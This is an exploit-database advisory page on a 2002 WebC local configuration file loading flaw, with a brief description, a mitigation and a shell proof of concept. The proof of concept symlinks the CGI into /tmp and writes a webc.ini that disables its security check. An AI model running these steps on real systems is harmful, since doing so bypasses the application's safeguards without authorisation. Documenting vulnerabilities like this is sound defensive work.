header-logo
Suggest Exploit
vendor:
WebC
by:
SecurityFocus
7.2
CVSS
HIGH
Local Configuration File Loading Vulnerability
264
CWE
Product Name: WebC
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

WebC Local Configuration File Loading Vulnerability

It has been reported that WebC will execute in the directory of a symbolic link from which it is invoked. Because of this, it may be possible for a local user to load a configuration file that enabled dangerous variables.

Mitigation:

Ensure that the WebC application is not installed in a directory that is accessible to untrusted users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7272/info

It has been reported that WebC will execute in the directory of a symbolic link from which it is invoked. Because of this, it may be possible for a local user to load a configuration file that enabled dangerous variables. 

$ cd /tmp
$ ln -s /usr/local/apache/cgi-bin/webc.cgi webc.cgi
$ cp /usr/local/apache/cgi-bin/webc.emf .
$ echo "WEBC_NO_SECURITY_CHECK=True" > webc.ini
$ echo "HTML_TRACE_REQUEST=/tmp/.debug1" >> webc.ini
$ ./webc.cgi

Navigation

Suggest Exploit

Services By CQR